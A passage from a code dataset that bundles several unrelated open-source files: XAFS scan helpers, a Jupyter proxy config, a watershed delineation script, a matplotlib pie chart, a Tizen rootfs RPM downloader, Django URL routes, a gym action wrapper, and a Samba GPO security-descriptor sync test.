interactive:\n length = 0\n bt = '\\n'\n for k in ('bounds', 'bounds_given', 'steps', 'times'):\n addition = ' %-13s : %-50s\\n' % (k,p[k])\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n for (k,v) in p.items():\n if k in ('bounds', 'bounds_given', 'steps', 'times'):\n continue\n if k in ('npoints', 'dwell', 'delay', 'inttime', 'channelcut', 'bothways'):\n continue\n addition = ' %-13s : %-50s\\n' % (k,v)\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n for k in ('post_webcam', 'post_anacam', 'post_usbcam1', 'post_usbcam2', 'post_xrf'):\n addition = ' %-13s : %-50s\\n' % (k,getattr(user_ns['BMMuser'], k))\n bt = bt + addition.rstrip() + '\\n'\n if len(addition) > length: length = len(addition)\n if length < 75: length = 75\n \n boxedtext('Control file contents', bt, 'cyan', width=length+4) # see 05-functions\n print(text)\n else:\n return(inifile, text)\n\n\ndef xafs_grid(inifile=None, **kwargs):\n '''\n Return the energy and time grids specified in an INI file.\n\n '''\n\n ## --*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--\n ## user input, find and parse the INI file\n ## try inifile as given then DATA + inifile\n ## this allows something like RE(xafs('myscan.ini')) -- short 'n' sweet\n BMMuser = user_ns['BMMuser']\n if inifile is None:\n inifile = present_options('ini')\n if inifile is None:\n return('', -1)\n if inifile[-4:] != '.ini':\n inifile = inifile+'.ini'\n orig = inifile\n if not os.path.isfile(inifile):\n inifile = os.path.join(BMMuser.DATA, inifile)\n if not os.path.isfile(inifile):\n print(warning_msg('\\n%s does not exist! Bailing out....\\n' % orig))\n return(orig, -1)\n print(bold_msg('reading ini file: %s' % inifile))\n (p, f) = scan_metadata(inifile=inifile, **kwargs)\n if not p:\n print(error_msg('%s could not be read as an XAFS control file\\n' % inifile))\n return(orig, -1)\n (ok, missing) = ini_sanity(f)\n if not ok:\n print(error_msg('\\nThe following keywords are missing from your INI file: '), '%s\\n' % str.join(', ', missing))\n return(orig, -1)\n (energy_grid, time_grid, approx_time, delta) = conventional_grid(p['bounds'], p['steps'], p['times'], e0=p['e0'], element=p['element'], edge=p['edge'], ththth=p['ththth'])\n print(f'{p[\"element\"]} {p[\"edge\"]}')\n return(energy_grid, time_grid)\n\n\n\n# def xanes():\n# BMMuser = user_ns['BMMuser']\n# defaul_ini = '/nsls2/data/bmm/shared/config/xafs/scan.ini'\n# el = BMMuser.element\n# yield from xafs(defaul_ini, filename=el+'_test', )\n","repo_name":"NSLS-II-BMM/profile_collection","sub_path":"startup/BMM/xafs.py","file_name":"xafs.py","file_ext":"py","file_size_in_byte":60565,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"3094089812","text":"import os\nimport yaml\n\n# load config\nwith open(os.path.expanduser('~/.jupyter/services.yaml'), 'r') as cfgfile:\n cfg = yaml.load(cfgfile, Loader=yaml.FullLoader)\n\ndef get_key(key, app='via', cfg=cfg):\n for a in cfg:\n for k, v in a.items():\n if k == app:\n return v.get(key)\n\ndef get_icon_path():\n return os.path.join(os.path.dirname(os.path.abspath(__file__)), 'icons', 'via.svg')\n \ndef setup_via():\n def _get_cmd(port):\n cmd = [\n os.path.join(os.path.dirname(os.path.abspath(__file__)), 'via'), \n '--base={base_url}via', \n '--listen=127.0.0.1', \n '--port={port}'\n ]\n return cmd\n return {\n 'command': _get_cmd,\n 'timeout': 180,\n 'new_browser_tab': get_key('new_browser'),\n 'launcher_entry': {\n 'title': 'VGG Image Annotator',\n 'icon_path': get_icon_path()\n }\n }","repo_name":"victor-moreno/jupyterhub-deploy-docker-VM","sub_path":"singleuser/srv/jupyter_via_proxy/jupyter_via_proxy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"32269399407","text":"from pysheds.grid import Grid\n# import numpy as np\nimport fiona\nimport os\nos.environ['USE_PYGEOS'] = '0'\nimport pandas as pd\nfrom shapely.geometry import Polygon\nfrom shapely.ops import unary_union\nfrom area import area\n\n#-------------------------------------------------------------------------------\n# Constants\n#-------------------------------------------------------------------------------\n# dem = \"data/n40w090_dem.tif\"\nFLDIR = os.path.join(os.path.dirname(__file__), \"data\", \"Rasters\", \"hyd_na_dir_15s.tif\")\nFLACC = os.path.join(os.path.dirname(__file__), \"data\", \"Rasters\", \"hyd_na_acc_15s.tif\")\n\n#-------------------------------------------------------------------------------\n# Calculate Watershed Area\n#-------------------------------------------------------------------------------\ndef calculate_area(shape=None):\n # print(\"my shape\")\n # print(shape)\n # format of shape => {'type': 'Polygon', 'coordinates': [[[x, y], [x, y] ...]]}\n area_km2 = area(shape) / 1e+6\n return round(area_km2, 2)\n\n#-------------------------------------------------------------------------------\n# Calculate Bounding Box\n#-------------------------------------------------------------------------------\ndef calculate_bbox(lat, lng, radius):\n lat_dist = 0.00902\n lng_dist = 0.00898\n minx = lng - (radius * lng_dist)\n miny = lat - (radius * lat_dist)\n maxx = lng + (radius * lng_dist)\n maxy = lat + (radius * lat_dist)\n \n return (minx, miny, maxx, maxy)\n\n\n#-------------------------------------------------------------------------------\n# Delineate Watershed\n#-------------------------------------------------------------------------------\ndef delineate(fldir_file=FLDIR, flacc_file=FLACC, output_dir=\"output\", output_fname='', basins=None, id_field=\"id\"):\n \"\"\"\n Description\n -----------\n delineate(dem, output_dir, basins) delineates watersheds\n\n Input Format Description\n ----- ------ -----------\n fldir_file str The path to the flow direction raster\n flacc_file str The path to the flow accumulation raster\n output_dir str The path to the output folder\n output_fname str The name of the output file\n basins DataFrame Pour point DataFrame or GeoDataFrame..\n id_field str Station ID field name.\n\n Output Format Description\n ------ ------ -----------\n watersheds Shapefiles The watershed shapefiles delineated\n\n Returns\n -------\n None\n\n \"\"\"\n # # Read elevation raster\n # # ----------------------------\n # print(\"Read elevation raster\")\n # grid = Grid.from_raster(dem, nodata=-9999)\n # dem = grid.read_raster(dem, nodata=grid.nodata)\n #\n # # Condition DEM\n # # ----------------------\n # # Fill pits in DEM\n # print(\"Filling pits\")\n # dem = grid.fill_pits(dem)\n #\n # # Fill depressions in DEM\n # print(\"Filling depressions\")\n # dem = grid.fill_depressions(dem)\n #\n # # Resolve flats in DEM\n # print(\"Resolving flats\")\n # dem = grid.resolve_flats(dem)\n #\n # # Crosschecking\n # print(\"Asserting filled sinks\")\n # # assert not grid.detect_pits(dem).any()\n # # assert not grid.detect_depressions(dem).any()\n # # assert not grid.detect_flats(dem).any()\n #\n # # Determine D8 flow directions from DEM\n # # ----------------------\n # # Specify directional mapping\n #\n # # print(\"Specify directional mapping\")\n # # dirmap = (64, 128, 1, 2, 4, 8, 16, 32)\n #\n # # Cardinal and intercardinal directions are represented by numeric values in\n # # the output grid. By default, the ESRI scheme is used:\n # # North: 64\n # # Northeast: 128\n # # East: 1\n # # Southeast: 2\n # # South: 4\n # # Southwest: 8\n # # West: 16\n # # Northwest: 32\n\n # Compute flow directions\n # -------------------------------------\n print(\"Compute flow directions\")\n # fdir = grid.flowdir(dem)\n grid = Grid.from_raster(fldir_file)\n fdir = grid.read_raster(fldir_file)\n\n \n # Delineate a catchment\n # ---------------------\n # Specify pour point\n print(\"Specify pour point\") \n lats = basins['lat'].tolist()\n lons = basins['lng'].tolist()\n st_ids = basins[id_field].tolist()\n # watersheds = []\n\n for index in range(0, len(lats)):\n x = lons[index]\n y = lats[index]\n st_id = st_ids[index]\n \n # Calculate flow accumulation\n # --------------------------\n print(\"Calculate flow accumulation\")\n # acc = grid.accumulation(fdir)\n bbox = calculate_bbox(y, x, 5)\n acc = grid.read_raster(flacc_file, window=bbox, window_crs=grid.crs)\n\n # Snap pour point to high accumulation cell\n print(\"Snapping pour point\")\n x_snap, y_snap = grid.snap_to_mask(acc > 1000, (x, y))\n\n # Delineate the catchment\n print(\"Delineate the catchment\")\n catch = grid.catchment(x=x_snap, y=y_snap, fdir=fdir, xytype='coordinate')\n # catch_view = grid.view(catch, dtype=np.uint8)\n\n watershed = grid.polygonize(data=catch, nodata=grid.nodata)\n watershed_dict = {st_id: []}\n \n # Merging Multi-Part Watersheds\n print(\"Merging Multi-Part Watersheds\")\n for shape, val in watershed:\n if val != 0:\n shp = Polygon(shape['coordinates'][0]).buffer(0.0001)\n watershed_dict[st_id].append(shp)\n \n merged = Polygon(unary_union(watershed_dict[st_id]).buffer(-0.0001))\n new_shape = {'type': 'Polygon', 'coordinates': [tuple(merged.exterior.coords)]}\n\n print(\"Writing to shapefile\")\n file = f\"{output_dir}/{output_fname}{st_id}.geojson\"\n # Specify schema\n schema = {'geometry': 'Polygon', 'properties': {'LABEL': 'float:16', id_field: 'str',\n 'lat': 'float', 'lng': 'float',\n 'area': 'float'}}\n if not (os.path.exists(file) and os.path.isfile(file)):\n # Write shapefile\n with fiona.open(file, 'w',\n driver='GeoJSON',\n crs=grid.crs.srs,\n schema=schema) as c:\n i = 0\n calc_area = calculate_area(new_shape)\n rec = {}\n rec['geometry'] = new_shape\n rec['properties'] = {'LABEL': str(val), id_field: st_id, 'lat': y, 'lng': x, 'area': calc_area}\n rec['id'] = str(i)\n c.write(rec)\n i += 1\n \n # for shape, value in watershed:\n # print(\"value\")\n # print(value)\n # if value == 0:\n # continue\n # shape['coordinates'][0] = shp\n # calc_area = calculate_area(shape)\n # rec = {}\n # rec['geometry'] = shape\n # rec['properties'] = {'LABEL': str(value), id_field: st_id, 'lat': y, 'lng': x, 'area': calc_area}\n # rec['id'] = str(i)\n # c.write(rec)\n # i += 1\n # print(\"check it\")\n # print(st_id, shape)\n\n\n#-------------------------------------------------------------------------------\n# Run Program\n#-------------------------------------------------------------------------------\ndef main():\n input_dir = \"data\"\n output_dir = \"output\"\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n\n # basins = pd.read_csv(f\"{input_dir}/basins.csv\") # path to csv of pour points\n basins = pd.read_csv(f\"{input_dir}/basins_random.csv\")\n delineate(output_dir=output_dir, basins=basins)\n\nif __name__ == \"__main__\":\n main()","repo_name":"kokubadejo/Watershed_Delineation","sub_path":"src/PySheds/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"26561913434","text":"import pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nfrom collections import Counter\r\n\r\n# read data\r\ndata = pd.read_csv('survey_result_langs.csv')\r\nlangs = data['Languages']\r\n\r\n# count the papularity of languages \r\nlangs_counter = Counter()\r\nfor record in langs:\r\n langs_counter.update(str(record).split(';'))\r\nlangs_counter = langs_counter.most_common(5)\r\n\r\n# make two lists languages and their popularity\r\nlangs = [i[0] for i in langs_counter]\r\npapularity = [i[1] for i in langs_counter]\r\nexplode = [0, 0, 0, 0.1, 0]\r\n\r\n\r\nplt.pie(papularity, labels=langs, autopct='%.2f%%', \\\r\n wedgeprops={'edgecolor':'black'}, shadow=True, explode=explode)\r\n\r\n# specify the plot( add details)\r\nplt.style.use('fast')\r\nplt.title('Programming Languages Popularity on stack overfow(2020)')\r\n\r\n\r\n# show the bar\r\nplt.show()\r\n","repo_name":"hikmatullah-mohammadi/python_matplot-tutorial","sub_path":"matplot_pie.py","file_name":"matplot_pie.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"33"} +{"seq_id":"27196933659","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport re\nimport shutil\nimport subprocess\nimport urllib.parse\nimport urllib.request\n\nbasePackages = [\n 'gcc',\n 'glibc',\n 'glibc-devel',\n 'libgcc',\n 'libstdc++',\n 'libstdc++-devel',\n 'linux-glibc-devel',\n 'zlib-devel',\n]\nunifiedPackages = [\n 'capi-base-common-devel',\n 'capi-base-utils',\n 'capi-base-utils-devel',\n 'capi-system-info',\n 'capi-system-info-devel',\n 'capi-system-system-settings',\n 'capi-system-system-settings-devel',\n 'coregl',\n 'coregl-devel',\n 'ecore-core',\n 'ecore-core-devel',\n 'ecore-imf',\n 'ecore-imf-devel',\n 'ecore-imf-evas-devel',\n 'ecore-input',\n 'ecore-wl2',\n 'ecore-wl2-devel',\n 'efl-devel',\n 'eina-devel',\n 'emile-devel',\n 'eo-devel',\n 'evas',\n 'evas-devel',\n 'freetype2-devel',\n 'jsoncpp',\n 'jsoncpp-devel',\n 'libdlog',\n 'libdlog-devel',\n 'libpng-devel',\n 'libtbm',\n 'libtbm-devel',\n 'libtdm-client',\n 'libtdm-client-devel',\n 'libtdm-devel',\n 'libwayland-client',\n 'libxkbcommon-devel',\n 'wayland-devel',\n]\n\n# Execute only if run as a script.\nif __name__ != \"__main__\":\n exit(1)\n\nif not shutil.which('rpm2cpio'):\n print('rpm2cpio is not installed. To install:\\n'\n ' sudo apt install rpm2cpio')\n exit(1)\nif not shutil.which('cpio'):\n print('cpio is not installed. To install:\\n'\n ' sudo apt install cpio')\n exit(1)\n\n# Parse arguments.\nparser = argparse.ArgumentParser(\n description='Tizen rootfs generator (for Flutter)')\nparser.add_argument(\n '-a', '--arch', type=str, choices=['arm', 'arm64', 'x86'],\n help='target architecture (defaults to \"arm\")',\n default='arm')\nparser.add_argument(\n '-o', '--output', metavar='PATH', type=str,\n help='path to the output directory (defaults to arch)')\nparser.add_argument(\n '-c', '--clean', action='store_true',\n help='clean the output directory and exit')\nparser.add_argument(\n '-b', '--base-repo', metavar='URL', type=str,\n help='url to the base packages repository',\n default='http://download.tizen.org/snapshots/tizen/5.5-base/latest/repos/standard/packages')\nparser.add_argument(\n '-u', '--unified-repo', metavar='URL', type=str,\n help='url to the unified packages repository',\n default='http://download.tizen.org/snapshots/tizen/5.5-unified/latest/repos/standard/packages')\nargs = parser.parse_args()\n\nif not args.output:\n args.output = args.arch\n\nif args.clean:\n shutil.rmtree(args.output)\n exit(0)\n\ndownloadPath = os.path.join(args.output, '.rpms')\nos.makedirs(downloadPath, exist_ok=True)\nexistingRpms = [f for f in os.listdir(downloadPath) if f.endswith('.rpm')]\n\nif args.arch == 'arm':\n archName = 'armv7l'\nelif args.arch == 'arm64':\n archName = 'aarch64'\nelif args.arch == 'x86':\n archName = 'i686'\nelse:\n print(f'Undefined arch: {args.arch}')\n exit(1)\n\n# Retrieve html documents.\ndocuments = {}\nfor url in [f'{args.base_repo}/{archName}',\n f'{args.base_repo}/noarch',\n f'{args.unified_repo}/{archName}',\n f'{args.unified_repo}/noarch']:\n request = urllib.request.Request(url)\n with urllib.request.urlopen(request) as response:\n documents[url] = response.read().decode('utf-8')\n\n# Download packages.\nfor package in basePackages + unifiedPackages:\n quoted = urllib.parse.quote(package)\n pattern = f'{re.escape(quoted)}-\\\\d+\\\\.[\\\\d_\\\\.]+-[\\\\d\\\\.]+\\\\..+\\\\.rpm'\n\n if any([re.match(pattern, f) for f in existingRpms]):\n print(f'Already downloaded {package}')\n continue\n\n for parent, doc in documents.items():\n match = re.findall(f'.+?', doc)\n if len(match) > 0:\n url = f'{parent}/{match[0]}'\n break\n\n if len(match) == 0:\n print(f'Could not find a package {package}')\n else:\n print(f'Downloading {url}...')\n urllib.request.urlretrieve(url, f'{downloadPath}/{match[0]}')\n\n# Extract files.\nfor rpm in [f for f in os.listdir(downloadPath) if f.endswith('.rpm')]:\n abspath = f'{os.path.abspath(downloadPath)}/{rpm}'\n command = f'cd {args.output} && rpm2cpio {abspath} | cpio -idum --quiet'\n subprocess.run(command, shell=True, check=True)\n\n# Create symbolic links. Any errors are ignored.\nsubprocess.run(f'ln -s asm-{args.arch} {args.output}/usr/include/asm',\n shell=True)\nsubprocess.run(f'ln -s libecore_input.so.1 {args.output}/usr/lib/libecore_input.so',\n shell=True)\n\nprint('Complete')\n","repo_name":"swift-kim/sysroot","sub_path":"build-rootfs.py","file_name":"build-rootfs.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35546341173","text":"from django.urls import path\nfrom bookmark import views\n\n\napp_name = 'bookmark' # 네임스페이스 \nurlpatterns = [\n # mvc ==> mvt : m - model, v - controller, t - view\n path('', views.BookmarkLV.as_view(), name='index'),\n path('/', views.BookmarkDV.as_view(), name='detail'),\n path('add/', views.BookmarkCreateView.as_view(), name=\"add\",),\n path('change/', views.BookmarkChangeLV.as_view(), name=\"change\",),\n path('/update/', views.BookmarkUpdateView.as_view(), name=\"update\",),\n path('/delete/', views.BookmarkDeleteView.as_view(), name=\"delete\",),\n]\n\n","repo_name":"gospelfinder/MySite","sub_path":"bookmark/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19484633628","text":"import gym\nimport random\n\nclass RandomActionWrapper(gym.ActionWrapper):\n\t\"\"\"docstring for RandomActionWrapper\"\"\"\n\tdef __init__(self, env, epsilon=0.5):\n\t\tsuper(RandomActionWrapper, self).__init__(env)\n\t\tself.epsilon = epsilon\n\n\tdef action(self, action):\n\t\tif random.random() < self.epsilon:\n\t\t\ta = self.env.action_space.sample()\n\t\t\tprint(\"random action !! [%d --> %d]\" % (action, a))\n\t\t\treturn a \n\t\telse:\n\t\t\treturn action\n\t\t\n\nif __name__ == '__main__':\n\tenv = RandomActionWrapper(gym.make(\"CartPole-v0\"))\n\n\ts = env.reset()\n\ttotal_return = 0.0\n\n\twhile 1:\n\t\ts, r, terminal, _ = env.step(0)\n\t\ttotal_return += r\n\t\tif terminal:\n\t\t\tbreak\n\n\tprint(\"Total return: %.3f\" % total_return)\n","repo_name":"whoji/training-ground","sub_path":"rl-lapan-book/chap2_wrapper.py","file_name":"chap2_wrapper.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"19868160381","text":"#!/usr/share/ucs-test/runner python3\n## desc: \"GPO Security Descriptor sync\"\n## exposure: dangerous\n## packages:\n## - univention-config\n## - univention-directory-manager-tools\n## - univention-samba4\n## - univention-s4-connector\n#\n# Bug #33768\n\n\nimport re\nimport subprocess\nimport time\n\nimport ldb\nfrom ldap.filter import filter_format\nfrom samba.auth import system_session\nfrom samba.credentials import Credentials\nfrom samba.dcerpc import security\nfrom samba.ndr import ndr_unpack\nfrom samba.param import LoadParm\nfrom samba.samdb import SamDB\nfrom samba.sd_utils import SDUtils\n\nimport univention.testing.udm as udm_test\nimport univention.uldap\nfrom univention.config_registry import ConfigRegistry\nfrom univention.s4connector import configdb\nfrom univention.testing import utils\nfrom univention.testing.strings import random_username\n\nimport s4connector\n\n\ndef set_ucr(ucr_set, ucr_unset=None, ucr=None):\n if not ucr:\n ucr = ConfigRegistry()\n ucr.load()\n\n previous_ucr_set = []\n previous_ucr_unset = []\n\n if ucr_set:\n if isinstance(ucr_set, str):\n ucr_set = (ucr_set,)\n\n for setting in ucr_set:\n var = setting.split(\"=\", 1)[0]\n new_val = setting.split(\"=\", 1)[1]\n old_val = ucr.get(var)\n if new_val == old_val:\n continue\n\n if old_val is not None:\n previous_ucr_set.append('%s=%s' % (var, old_val))\n else:\n previous_ucr_unset.append('%s' % (var,))\n\n univention.config_registry.handler_set(ucr_set)\n\n if ucr_unset:\n if isinstance(ucr_unset, str):\n ucr_unset = (ucr_unset,)\n\n for var in ucr_unset:\n val = ucr.get(var)\n if val is not None:\n previous_ucr_set.append('%s=%s' % (var, val))\n\n univention.config_registry.handler_unset(ucr_unset)\n\n return (previous_ucr_set, previous_ucr_unset)\n\n\nclass Testclass_GPO_Security_Descriptor:\n\n def __init__(self, udm, ucr=None):\n self.SAM_LDAP_FILTER_GPO = \"(&(objectclass=grouppolicycontainer)(cn=%s))\"\n self.gpo_ldap_filter = None\n self.gponame = None\n\n self.udm = udm\n\n if ucr:\n self.ucr = ucr\n else:\n self.ucr = ConfigRegistry()\n self.ucr.load()\n\n self.adminaccount = utils.UCSTestDomainAdminCredentials()\n self.machine_ucs_ldap = univention.uldap.getMachineConnection()\n\n self.fqdn = \".\".join((self.ucr[\"hostname\"], self.ucr[\"domainname\"]))\n\n self.lp = LoadParm()\n self.lp.load_default()\n\n self.samba_machine_creds = Credentials()\n self.samba_machine_creds.guess(self.lp)\n self.samba_machine_creds.set_machine_account(self.lp)\n self.machine_samdb = SamDB(url=\"/var/lib/samba/private/sam.ldb\", session_info=system_session(), credentials=self.samba_machine_creds, lp=self.lp)\n self.domain_sid = security.dom_sid(self.machine_samdb.get_domain_sid())\n self.DA_SID = security.dom_sid(\"%s-%d\" % (self.domain_sid, security.DOMAIN_RID_ADMINS))\n self.DU_SID = security.dom_sid(\"%s-%d\" % (self.domain_sid, security.DOMAIN_RID_USERS))\n\n self.samba_admin_creds = Credentials()\n self.samba_admin_creds.guess(self.lp)\n self.samba_admin_creds.parse_string(self.adminaccount.username)\n self.samba_admin_creds.set_password(self.adminaccount.bindpw)\n self.admin_samdb = SamDB(url=\"/var/lib/samba/private/sam.ldb\", session_info=system_session(), credentials=self.samba_admin_creds, lp=self.lp)\n self.admin_samdb_sdutil = SDUtils(self.admin_samdb)\n\n def restart_s4_connector(self):\n cmd = (\"/etc/init.d/univention-s4-connector\", \"restart\")\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n utils.fail(\"Error restarting S4 Connector: %s\\nCommand was: %s\" % (stdout.decode('UTF-8', 'replace'), cmd))\n\n def activate_ntsd_sync(self):\n ucr_set = [\"connector/s4/mapping/gpo/ntsd=true\"]\n self.previous_ucr_set, self.previous_ucr_unset = set_ucr(ucr_set, ucr=self.ucr)\n if self.previous_ucr_unset or self.previous_ucr_set:\n self.restart_s4_connector()\n\n def __enter__(self):\n self.activate_ntsd_sync()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type:\n print('GPO Cleanup after exception: %s %s' % (exc_type, exc_value))\n if self.previous_ucr_unset or self.previous_ucr_set:\n set_ucr(self.previous_ucr_set, self.previous_ucr_unset, ucr=self.ucr)\n self.restart_s4_connector()\n self.remove_gpo()\n\n def get_ldb_object(self, dn=None, ldap_filter=None, attrs=None):\n if not attrs:\n attrs = [\"*\"]\n if not ldap_filter:\n ldap_filter = \"(objectClass=*)\"\n\n if dn:\n res = self.machine_samdb.search(base=dn, scope=ldb.SCOPE_BASE, expression=ldap_filter, attrs=attrs)\n else:\n res = self.machine_samdb.search(expression=ldap_filter, attrs=attrs)\n\n for ldb_msg in res:\n return ldb_msg\n\n def get_ldb_gpo(self, gponame):\n ldap_filter = filter_format(self.SAM_LDAP_FILTER_GPO, (gponame,))\n attrs = [\"nTSecurityDescriptor\", \"uSNChanged\"]\n ldb_msg = self.get_ldb_object(ldap_filter=ldap_filter, attrs=attrs)\n return ldb_msg\n\n def get_ntsd(self, obj):\n if isinstance(obj, ldb.Message):\n ntsd_ndr = obj[\"nTSecurityDescriptor\"][0]\n ntsd = ndr_unpack(security.descriptor, ntsd_ndr)\n elif isinstance(obj, tuple):\n ntsd_sddl = obj[1].get(\"msNTSecurityDescriptor\", [None])[0]\n if not ntsd_sddl:\n raise ValueError(\"No msNTSecurityDescriptor synchronized\")\n ntsd = security.descriptor.from_sddl(ntsd_sddl.decode('ASCII'), self.domain_sid)\n elif isinstance(obj, str):\n ntsd = security.descriptor.from_sddl(obj, self.domain_sid)\n elif isinstance(obj, bytes):\n ntsd = security.descriptor.from_sddl(obj.decode('ASCII'), self.domain_sid)\n else:\n raise ValueError(\"General ValueError\")\n\n return ntsd\n\n def assert_owner(self, ntsd, expected_sid, logtag='assert_owner'):\n if ntsd.owner_sid != expected_sid:\n utils.fail(\"ERROR: %s: Unexpected owner SID! Expected: %s, Found: %s\" % (logtag, expected_sid, ntsd.owner_sid))\n\n def get_ucs_ldap_object(self, ucs_dn):\n res = self.machine_ucs_ldap.search(base=ucs_dn, scope=\"base\", attr=[\"*\"])\n return res[0]\n\n def wait_for_s4connector_sync_to_ucs(self, ldb_msg, logtag=\"wait_for_s4connector_sync_to_ucs\"):\n\n usn = int(ldb_msg[\"uSNChanged\"][0])\n\n configdbfile = '/etc/univention/connector/s4internal.sqlite'\n s4c_internaldb = configdb(configdbfile)\n\n t0 = time.time()\n while int(s4c_internaldb.get(\"S4\", \"lastUSN\")) < usn:\n if time.time() - t0 > 120:\n utils.fail(\"ERROR: %s: Replication takes too long, aborting\" % logtag)\n time.sleep(1)\n time.sleep(15)\n\n def wait_for_object_usn_change(self, ldb_msg, logtag=\"wait_for_object_usn_change\"):\n\n initial_usn = int(ldb_msg[\"uSNChanged\"][0])\n usn = initial_usn\n\n t0 = time.time()\n while usn == initial_usn:\n time.sleep(1)\n if time.time() - t0 > 120:\n utils.fail(\"ERROR: %s: Replication takes too long, aborting\" % logtag)\n ldb_msg = self.get_ldb_object(dn=str(ldb_msg.dn), attrs=[\"uSNChanged\"])\n usn = int(ldb_msg[\"uSNChanged\"][0])\n time.sleep(15)\n\n def remove_gpo(self, critical=True):\n if self.gponame:\n cmd = (\n \"samba-tool\", \"gpo\", \"del\", self.gponame,\n \"-k\", \"no\",\n \"-H\", \"ldap://%s\" % (self.fqdn,),\n \"--username\", self.adminaccount.username,\n \"--password\", self.adminaccount.bindpw)\n\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n if critical:\n utils.fail(\"Error removing GPO using samba-tool: %s\\nCommand was: %s\" % (stdout.decode('UTF-8', 'replace'), cmd))\n else:\n self.gponame = None\n\n def create_gpo(self, logtag=\"create_gpo\"):\n display_name = 'ucs_test_gpo_' + random_username(8)\n\n cmd = (\n \"samba-tool\", \"gpo\", \"create\", display_name,\n \"-k\", \"no\",\n \"-H\", \"ldap://%s\" % (self.fqdn,),\n \"--username\", self.adminaccount.username,\n \"--password\", self.adminaccount.bindpw)\n\n p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)\n stdout, stderr = p1.communicate()\n if p1.returncode != 0:\n utils.fail(\"ERROR: %s: creating GPO using samba-tool: %s\\nCommand was: %s\" % (logtag, stdout.decode('UTF-8', 'replace'), cmd))\n\n stdout = stdout.decode('UTF-8', 'replace').rstrip()\n try:\n self.gponame = '{' + re.search('{(.+?)}', stdout).group(1) + '}'\n self.gpo_ldap_filter = filter_format(self.SAM_LDAP_FILTER_GPO, (self.gponame,))\n except AttributeError as ex:\n utils.fail(\"Could not find the GPO reference in the STDOUT '%s' of the 'samba-tool', error: '%s'\" % (stdout, ex))\n\n def modify_udm_object(self, modulename, **kwargs):\n cmd = self.udm._build_udm_cmdline(modulename, 'modify', kwargs)\n child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False)\n (stdout, stderr) = child.communicate()\n\n if child.returncode:\n raise udm_test.UCSTestUDM_ModifyUDMObjectFailed({'module': modulename, 'kwargs': kwargs, 'returncode': child.returncode, 'stdout': stdout.decode('UTF-8', 'replace'), 'stderr': stderr.decode('UTF-8', 'replace')})\n\n def modify_sd_on_ucs_ldap_gpo(self, ucs_dn, ucs_ntsd):\n self.modify_udm_object('container/msgpo', dn=ucs_dn, msNTSecurityDescriptor=ucs_ntsd.as_sddl())\n\n\nclass Testcase_GPO_Security_Descriptor_UDM_to_SAM(Testclass_GPO_Security_Descriptor):\n\n def run(self):\n sync_from = \"UDM\"\n sync_to = \"SAM\"\n print(\"GPO Security Descriptor sync from %s to %s\" % (sync_from, sync_to))\n PHASE = \"preparation\"\n\n self.create_gpo(logtag=PHASE)\n print('GPO Name: %s' % self.gponame)\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n self.wait_for_s4connector_sync_to_ucs(ldb_msg, logtag=PHASE)\n\n sam_ntsd = self.get_ntsd(ldb_msg)\n self.assert_owner(sam_ntsd, self.DA_SID, logtag=PHASE)\n\n # we need the exact case of the DN otherwise udm cli will fail\n temp_dn = str(ldb_msg.dn).lower().replace(self.ucr[\"samba4/ldap/base\"].lower(), self.ucr[\"ldap/base\"])\n ucs_dn = self.machine_ucs_ldap.searchDn(base=temp_dn, scope='base')[0]\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor differs between %s and %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = \"test\"\n\n ucs_ntsd.owner_sid = self.DU_SID\n self.modify_sd_on_ucs_ldap_gpo(ucs_dn, ucs_ntsd)\n\n uldap_msg = self.get_ucs_ldap_object(ucs_dn)\n try:\n ucs_ntsd = self.get_ntsd(uldap_msg)\n except ValueError as ex:\n utils.fail(\"ERROR: %s: %s\" % (PHASE, ex.args[0]))\n self.assert_owner(ucs_ntsd, self.DU_SID, logtag=PHASE)\n\n self.wait_for_object_usn_change(ldb_msg, logtag=PHASE)\n\n ldb_msg = self.get_ldb_gpo(self.gponame)\n sam_ntsd = self.get_ntsd(ldb_msg)\n\n if ucs_ntsd.as_sddl() != sam_ntsd.as_sddl():\n utils.fail(\"ERROR: %s: NT Security descriptor not synchronized from %s to %s\" % (PHASE, sync_from, sync_to))\n\n PHASE = 